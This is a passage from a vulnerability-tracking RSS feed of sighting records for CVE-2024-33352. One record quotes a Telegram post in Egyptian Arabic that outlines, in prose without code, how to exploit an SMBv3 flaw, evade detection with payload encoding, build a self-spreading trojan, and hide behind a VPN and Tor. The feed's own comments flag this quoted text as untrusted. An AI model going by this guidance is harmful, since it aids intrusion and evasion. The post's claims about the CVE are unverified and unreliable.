\u0639\u0644\u0634\u0627\u0646 \u062a\u0642\u0641\u0644 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u062f\u064a 
\u0648\u0643\u0645\u0627\u0646 \u0644\u0627\u0632\u0645 \u062a\u0643\u0648\u0646 \u0639\u0644\u0649 \u062f\u0631\u0627\u064a\u0629 \u062a\u0627\u0645\u0629 \u0628\u0643\u0644 \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0637\u0628\u0642\u0647\u0627 \u0639\u0644\u0634\u0627\u0646 \u062a\u062d\u0645\u064a \u0646\u0641\u0633\u0643 \u0648\u0623\u062c\u0647\u0632\u062a\u0643 \u0645\u0646 \u0623\u064a \u0647\u062c\u0648\u0645 \u0645\u0645\u0643\u0646.\n\n\u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0628\u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0646 \u0628\u0639\u062f \u0648\u064a\u0633\u064a\u0637\u0631 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0648\u0628\u0627\u0644\u062a\u0627\u0644\u064a \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 \u0641\u064a \u062a\u0646\u0641\u064a\u0630 \u0647\u062c\u0645\u0627\u062a \u0645\u062a\u0646\u0648\u0639\u0629 \u0632\u064a \u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0634\u0628\u0643\u0627\u062a \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629 \u0623\u0648 \u062d\u062a\u0649 \u062a\u0648\u062c\u064a\u0647 \u0647\u062c\u0645\u0627\u062a DDoS \u0628\u0634\u0643\u0644 \u0641\u0639\u0627\u0644 \u062c\u062f\u0627\u064b. 
\u0648\u0644\u0648 \u0643\u0646\u062a \u0639\u0627\u0648\u0632 \u062a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0641\u064a \u0645\u0627\u0644\u0648\u064a\u0631 \u0645\u0645\u0643\u0646 \u062a\u062f\u0645\u062c\u0647\u0627 \u0641\u064a \u0628\u0631\u0646\u0627\u0645\u062c \u062e\u0628\u064a\u062b \u064a\u0642\u0648\u0645 \u0628\u0646\u0634\u0631 \u0646\u0641\u0633\u0647 \u0639\u0628\u0631 \u0627\u0644\u0634\u0628\u0643\u0629 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMBv3 \u0648\u062f\u0647 \u0647\u064a\u062e\u0644\u064a \u0627\u0644\u0645\u0627\u0644\u0648\u064a\u0631 \u064a\u0646\u062a\u0634\u0631 \u0628\u0633\u0631\u0639\u0629 \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u0627\u064b \u0628\u064a\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0644\u064a \u0634\u063a\u0627\u0644\u0629 \u0639\u0644\u0649 \u0646\u0641\u0633 \u0627\u0644\u0634\u0628\u0643\u0629 \u0648\u0628\u0627\u0644\u062a\u0627\u0644\u064a \u062a\u0632\u0648\u062f \u0641\u0631\u0635 \u0646\u062c\u0627\u062d \u0627\u0644\u0647\u062c\u0648\u0645 \u0628\u0634\u0643\u0644 \u0643\u0628\u064a\u0631.", "creation_timestamp": "2025-03-21T12:03:59.000000Z"}</description>
      <content:encoded>{"uuid": "2d520f7b-8c6c-4312-a64a-5f06aabd0211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/3542", "content": "CVE-2024-33352 \u0647\u0648 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u062e\u0637\u064a\u0631\u0629 \u0641\u064a \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMBv3 \u0648\u062f\u064a \u0628\u062a\u0623\u062b\u0631 \u0639\u0644\u0649 \u0643\u0644 \u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0644\u064a \u0628\u062a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u062f\u0647 \u0632\u064a Windows \u0648\u0628\u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0646 \u0628\u064f\u0639\u062f \u0648\u064a\u0633\u064a\u0637\u0631 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641. 
\u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629 \u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0647\u064a \u0639\u0646 \u0637\u0631\u064a\u0642 \u0625\u0631\u0633\u0627\u0644 \u062d\u0632\u0645 \u0628\u064a\u0627\u0646\u0627\u062a \u0645\u0639\u064a\u0646\u0629 \u062a\u0645 \u062a\u0643\u0648\u064a\u0646\u0647\u0627 \u0628\u0634\u0643\u0644 \u062e\u0627\u0635 \u0644\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0627\u0644\u0644\u064a \u0628\u064a\u0634\u063a\u0644 \u062e\u062f\u0645\u0629 SMB \u0648\u0628\u064a\u0643\u0648\u0646 \u0627\u0644\u0647\u062f\u0641 \u0625\u0646 \u0627\u0644\u062d\u0632\u0645 \u062f\u064a \u062a\u062e\u0644\u064a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u064a\u0642\u0631\u0623 \u0628\u064a\u0627\u0646\u0627\u062a \u063a\u064a\u0631 \u0635\u062d\u064a\u062d\u0629 \u0648\u064a\u0628\u062f\u0623 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u062e\u0628\u064a\u062b\u0629.\n\n\u0639\u0644\u0634\u0627\u0646 \u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0641\u064a \u0647\u062c\u0648\u0645 \u0623\u0648 \u062a\u0636\u064a\u0641\u0647\u0627 \u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u062e\u0628\u064a\u062b\u0629 \u0632\u064a \u0627\u0644\u0645\u0627\u0644\u0648\u064a\u0631\u060c \u0623\u0648\u0644 \u062d\u0627\u062c\u0629 \u0644\u0627\u0632\u0645 \u062a\u0639\u0645\u0644\u0647\u0627 \u0647\u064a \u0625\u0646\u0643 \u062a\u062c\u0647\u0632 \u062d\u0632\u0645 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u062e\u0627\u0635\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0648\u062f\u064a \u0628\u062a\u0643\u0648\u0646 \u0639\u0628\u0627\u0631\u0629 \u0639\u0646 \u0633\u0644\u0633\u0644\u0629 \u0645\u0646 
\u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0648\u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0648\u0627\u0641\u0642 \u0645\u0639 \u0627\u0644\u0634\u0631\u0648\u0637 \u0627\u0644\u0645\u062d\u062f\u062f\u0629 \u0644\u0644\u062b\u063a\u0631\u0629 \u0644\u0627\u0632\u0645 \u062a\u062a\u0623\u0643\u062f \u0625\u0646 \u0627\u0644\u062d\u0632\u0645 \u062f\u064a \u0645\u0635\u0645\u0645\u0629 \u0628\u0637\u0631\u064a\u0642\u0629 \u062a\u062e\u0644\u064a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u064a\u0642\u0631\u0623\u0647\u0627 \u0643\u0628\u064a\u0627\u0646\u0627\u062a \u0633\u0644\u064a\u0645\u0629 \u0641\u064a \u0627\u0644\u0628\u062f\u0627\u064a\u0629 \u0648\u0628\u0639\u062f \u0643\u062f\u0647 \u064a\u0646\u0641\u0630 \u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0627\u0644\u0644\u064a \u0641\u064a\u0647\u0627 \u0641\u064a \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u062f\u064a \u0647\u0646\u0648\u0636\u062d \u0625\u0632\u0627\u064a \u062a\u0642\u062f\u0631 \u062a\u0646\u0641\u0630 \u0627\u0644\u0647\u062c\u0648\u0645 \u0628\u0634\u0643\u0644 \u0639\u0644\u0645\u064a \u0648\u062f\u0642\u064a\u0642.\n\n\u0623\u0648\u0644\u0627\u064b\u060c \u0647\u062a\u0628\u062f\u0623 \u0628\u062a\u062d\u0644\u064a\u0644 \u0643\u0648\u062f \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0645\u0648\u062c\u0648\u062f \u0639\u0644\u0649 GitHub \u0648\u062a\u0641\u0647\u0645 \u0643\u0648\u064a\u0633 \u0625\u0632\u0627\u064a \u0628\u064a\u0634\u062a\u063a\u0644 \u0627\u0644\u062c\u0632\u0621 \u0627\u0644\u062e\u0627\u0635 \u0628\u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u062d\u0632\u0645 \u0648\u0647\u0646\u0627 \u0644\u0627\u0632\u0645 \u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u062f\u0648\u0627\u062a \u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0632\u064a Wireshark \u0639\u0644\u0634\u0627\u0646 \u062a\u0631\u0627\u0642\u0628 \u062d\u0631\u0643\u0629 
\u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0648\u062a\u0641\u0647\u0645 \u0625\u0632\u0627\u064a \u0627\u0644\u062d\u0632\u0645 \u0628\u062a\u062a\u0628\u0627\u062f\u0644 \u0628\u064a\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0648\u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0648\u062f\u0647 \u0647\u064a\u0633\u0627\u0639\u062f\u0643 \u062a\u0643\u062a\u0634\u0641 \u0627\u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0636\u0639\u064a\u0641\u0629 \u0641\u064a \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644. \u0628\u0639\u062f \u0643\u062f\u0647 \u0647\u062a\u0628\u062f\u0623 \u0641\u064a \u0625\u0639\u062f\u0627\u062f \u0643\u0648\u062f \u0627\u0644\u0628\u0631\u0645\u062c\u0629 \u0627\u0644\u062e\u0627\u0635 \u0628\u064a\u0643 \u0639\u0644\u0634\u0627\u0646 \u062a\u0628\u0639\u062a \u0627\u0644\u062d\u0632\u0645 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0644\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0648\u062f\u0647 \u0645\u0645\u0643\u0646 \u062a\u0639\u0645\u0644\u0647 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0644\u063a\u0627\u062a \u0628\u0631\u0645\u062c\u0629 \u0632\u064a Python \u0623\u0648 C++ \u0648\u062f\u064a \u0644\u063a\u0627\u062a \u0642\u0648\u064a\u0629 \u0648\u062a\u0642\u062f\u0631 \u062a\u0643\u062a\u0628 \u0628\u064a\u0647\u0627 \u0623\u0643\u0648\u0627\u062f \u0628\u062a\u0646\u0641\u0630 \u0623\u0648\u0627\u0645\u0631 \u0645\u0639\u0642\u062f\u0629.\n\n\u062b\u0627\u0646\u064a\u0627\u064b\u060c \u0644\u0627\u0632\u0645 \u062a\u062e\u062a\u0627\u0631 \u0627\u0644\u0647\u062f\u0641 \u0628\u062a\u0627\u0639\u0643 \u0628\u0639\u0646\u0627\u064a\u0629 \u0648\u062f\u0647 \u0628\u064a\u0643\u0648\u0646 \u0633\u064a\u0631\u0641\u0631 \u0628\u064a\u0634\u063a\u0644 \u062e\u062f\u0645\u0629 SMBv3 \u0648\u0639\u0644\u064a\u0647 \u0646\u0638\u0627\u0645 \u062a\u0634\u063a\u064a\u0644 \u0642\u0627\u0628\u0644 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 
\u0648\u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u0625\u0646\u0643 \u062a\u0643\u0648\u0646 \u0645\u062c\u0647\u0632 \u0628\u064a\u0626\u0629 \u0627\u062e\u062a\u0628\u0627\u0631 \u0622\u0645\u0646\u0629 \u0639\u0644\u0634\u0627\u0646 \u062a\u062c\u0631\u0628 \u0639\u0644\u064a\u0647\u0627 \u0627\u0644\u0647\u062c\u0648\u0645 \u0642\u0628\u0644 \u0645\u0627 \u062a\u0646\u0641\u0630\u0647 \u0641\u064a \u0627\u0644\u0628\u064a\u0626\u0629 \u0627\u0644\u062d\u0642\u064a\u0642\u064a\u0629 \u0648\u062a\u0642\u062f\u0631 \u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u062f\u0648\u0627\u062a \u0632\u064a Metasploit Framework \u0639\u0644\u0634\u0627\u0646 \u062a\u062e\u062a\u0628\u0631 \u0627\u0644\u062b\u063a\u0631\u0629 \u0648\u062a\u0639\u062f\u0644 \u0639\u0644\u0649 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0628\u062a\u0627\u0639\u062a\u0643 \u0648\u062a\u062a\u0627\u0643\u062f \u0625\u0646\u0647\u0627 \u0628\u062a\u0634\u062a\u063a\u0644 \u0628\u0634\u0643\u0644 \u0635\u062d\u064a\u062d.\n\n\u062b\u0627\u0644\u062b\u0627\u064b\u060c \u0644\u0627\u0632\u0645 \u062a\u0636\u064a\u0641 \u0628\u0639\u0636 \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0625\u0636\u0627\u0641\u064a\u0629 \u0644\u062a\u062d\u0633\u064a\u0646 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0648\u062f\u0647 \u0628\u064a\u0634\u0645\u0644 \u062a\u0634\u0641\u064a\u0631 \u0627\u0644\u062d\u0632\u0645 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0628\u0637\u0631\u064a\u0642\u0629 \u062a\u062e\u0644\u064a \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0623\u0635\u0639\u0628 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0623\u062f\u0648\u0627\u062a \u0632\u064a Msfvenom \u0645\u0645\u0643\u0646 \u062a\u0636\u064a\u0641 \u0623\u0643\u0648\u0627\u062f \u062a\u0634\u0641\u064a\u0631 \u0644\u0644\u0623\u0648\u0627\u0645\u0631 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0639\u0644\u0634\u0627\u0646 \u062a\u0639\u062f\u064a \u0645\u0646 
\u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062d\u0645\u0627\u064a\u0629.\n\n\u0645\u0646 \u0636\u0645\u0646 \u0627\u0644\u062a\u062d\u0633\u064a\u0646\u0627\u062a \u0627\u0644\u0645\u0645\u0643\u0646\u0629 \u0647\u064a \u0625\u0646\u0643 \u062a\u062f\u0645\u062c \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0641\u064a \u0645\u0627\u0644\u0648\u064a\u0631 \u0623\u0643\u0628\u0631 \u064a\u0639\u0646\u064a \u0645\u062b\u0644\u0627\u064b \u062a\u0642\u062f\u0631 \u062a\u0639\u0645\u0644 \u062d\u0635\u0627\u0646 \u0637\u0631\u0648\u0627\u062f\u0629 (Trojan Horse) \u0628\u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0639\u0644\u0634\u0627\u0646 \u064a\u062f\u062e\u0644 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0648\u0628\u0639\u062f \u0643\u062f\u0647 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u062e\u0628\u064a\u062b\u0629 \u0632\u064a \u0633\u0631\u0642\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0623\u0648 \u062a\u062f\u0645\u064a\u0631 \u0645\u0644\u0641\u0627\u062a \u0623\u0648 \u062d\u062a\u0649 \u062a\u062d\u0645\u064a\u0644 \u0645\u0627\u0644\u0648\u064a\u0631 \u0625\u0636\u0627\u0641\u064a. 
\u0648\u0623\u062e\u064a\u0631\u0627\u064b \u0644\u0627\u0632\u0645 \u062a\u0643\u0648\u0646 \u062d\u0631\u064a\u0635 \u062c\u062f\u0627\u064b \u0648\u062a\u0627\u062e\u062f \u0643\u0644 \u0627\u062d\u062a\u064a\u0627\u0637\u0627\u062a\u0643 \u0639\u0644\u0634\u0627\u0646 \u0645\u062a\u062a\u0639\u0631\u0636\u0634 \u0644\u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0623\u0648 \u0627\u0644\u062a\u0639\u0642\u0628 \u064a\u0639\u0646\u064a \u0644\u0627\u0632\u0645 \u062a\u0633\u062a\u062e\u062f\u0645 \u0634\u0628\u0643\u0629 \u0648\u0647\u0645\u064a\u0629 (VPN) \u0648\u062a\u063a\u064a\u0631 \u0645\u0648\u0642\u0639\u0643 \u0628\u0627\u0633\u062a\u0645\u0631\u0627\u0631 \u0648\u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u062f\u0648\u0627\u062a \u0625\u062e\u0641\u0627\u0621 \u0627\u0644\u0647\u0648\u064a\u0629 \u0632\u064a Tor.\n\n\u0644\u0627\u0632\u0645 \u062a\u0639\u0631\u0641 \u0625\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u062e\u0637\u064a\u0631\u0629 \u062c\u062f\u0627\u064b \u0648\u0644\u0648 \u062a\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0628\u0634\u0643\u0644 \u0635\u062d\u064a\u062d \u0645\u0645\u0643\u0646 \u062a\u0633\u0628\u0628 \u0623\u0636\u0631\u0627\u0631 \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u0627\u064b \u0644\u0623\u064a \u0646\u0638\u0627\u0645 \u0639\u0644\u0634\u0627\u0646 \u0643\u062f\u0647 \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0628\u062a\u0646\u0635\u062d \u0628\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0628\u0627\u0633\u062a\u0645\u0631\u0627\u0631 \u0648\u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u0628\u0627\u062a\u0634\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0646\u0632\u0644\u0647\u0627 \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0639\u0644\u0634\u0627\u0646 \u062a\u0642\u0641\u0644 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u062f\u064a 
\u0648\u0643\u0645\u0627\u0646 \u0644\u0627\u0632\u0645 \u062a\u0643\u0648\u0646 \u0639\u0644\u0649 \u062f\u0631\u0627\u064a\u0629 \u062a\u0627\u0645\u0629 \u0628\u0643\u0644 \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0637\u0628\u0642\u0647\u0627 \u0639\u0644\u0634\u0627\u0646 \u062a\u062d\u0645\u064a \u0646\u0641\u0633\u0643 \u0648\u0623\u062c\u0647\u0632\u062a\u0643 \u0645\u0646 \u0623\u064a \u0647\u062c\u0648\u0645 \u0645\u0645\u0643\u0646.\n\n\u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0628\u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0646 \u0628\u0639\u062f \u0648\u064a\u0633\u064a\u0637\u0631 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0648\u0628\u0627\u0644\u062a\u0627\u0644\u064a \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 \u0641\u064a \u062a\u0646\u0641\u064a\u0630 \u0647\u062c\u0645\u0627\u062a \u0645\u062a\u0646\u0648\u0639\u0629 \u0632\u064a \u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0634\u0628\u0643\u0627\u062a \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629 \u0623\u0648 \u062d\u062a\u0649 \u062a\u0648\u062c\u064a\u0647 \u0647\u062c\u0645\u0627\u062a DDoS \u0628\u0634\u0643\u0644 \u0641\u0639\u0627\u0644 \u062c\u062f\u0627\u064b. 
\u0648\u0644\u0648 \u0643\u0646\u062a \u0639\u0627\u0648\u0632 \u062a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0641\u064a \u0645\u0627\u0644\u0648\u064a\u0631 \u0645\u0645\u0643\u0646 \u062a\u062f\u0645\u062c\u0647\u0627 \u0641\u064a \u0628\u0631\u0646\u0627\u0645\u062c \u062e\u0628\u064a\u062b \u064a\u0642\u0648\u0645 \u0628\u0646\u0634\u0631 \u0646\u0641\u0633\u0647 \u0639\u0628\u0631 \u0627\u0644\u0634\u0628\u0643\u0629 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMBv3 \u0648\u062f\u0647 \u0647\u064a\u062e\u0644\u064a \u0627\u0644\u0645\u0627\u0644\u0648\u064a\u0631 \u064a\u0646\u062a\u0634\u0631 \u0628\u0633\u0631\u0639\u0629 \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u0627\u064b \u0628\u064a\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0644\u064a \u0634\u063a\u0627\u0644\u0629 \u0639\u0644\u0649 \u0646\u0641\u0633 \u0627\u0644\u0634\u0628\u0643\u0629 \u0648\u0628\u0627\u0644\u062a\u0627\u0644\u064a \u062a\u0632\u0648\u062f \u0641\u0631\u0635 \u0646\u062c\u0627\u062d \u0627\u0644\u0647\u062c\u0648\u0645 \u0628\u0634\u0643\u0644 \u0643\u0628\u064a\u0631.", "creation_timestamp": "2025-03-21T12:03:59.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/2d520f7b-8c6c-4312-a64a-5f06aabd0211/export</guid>
      <pubDate>Fri, 21 Mar 2025 12:03:59 +0000</pubDate>
    </item>
    <item>
      <!-- One sighting record for CVE-2024-33352. The JSON below has type "seen", an empty
           "content" string, and a "source" given only as an opaque Telegram/... token.
           NOTE(review): "seen" presumably means the CVE was mentioned without a captured
           message body; confirm against the sighting type definitions. -->
      <title>dca6e1a3-4567-436f-80ea-1123aeca27b2</title>
      <link>https://vulnerability.circl.lu/sighting/dca6e1a3-4567-436f-80ea-1123aeca27b2/export</link>
      <!-- description and content:encoded carry the same JSON object as element text.
           Consumers should parse it as JSON and treat every field, "content" in particular,
           as untrusted third-party text: other items in this feed quote chat posts verbatim,
           so the text must not be rendered as HTML or taken as a verified description of the CVE. -->
      <description>{"uuid": "dca6e1a3-4567-436f-80ea-1123aeca27b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "seen", "source": "Telegram/Aa-0BibdUURQTQB8vAK81JOhZI4LJlfkqSwyDkBvxH4d8YE", "content": "", "creation_timestamp": "2026-05-08T03:00:10.000000Z"}</description>
      <content:encoded>{"uuid": "dca6e1a3-4567-436f-80ea-1123aeca27b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "seen", "source": "Telegram/Aa-0BibdUURQTQB8vAK81JOhZI4LJlfkqSwyDkBvxH4d8YE", "content": "", "creation_timestamp": "2026-05-08T03:00:10.000000Z"}</content:encoded>
      <!-- guid repeats the export URL from link but is marked isPermaLink="false", so readers
           should use it only as an opaque identifier. pubDate is the same instant as
           creation_timestamp in the JSON. -->
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/dca6e1a3-4567-436f-80ea-1123aeca27b2/export</guid>
      <pubDate>Fri, 08 May 2026 03:00:10 +0000</pubDate>
    </item>
  </channel>
</rss>
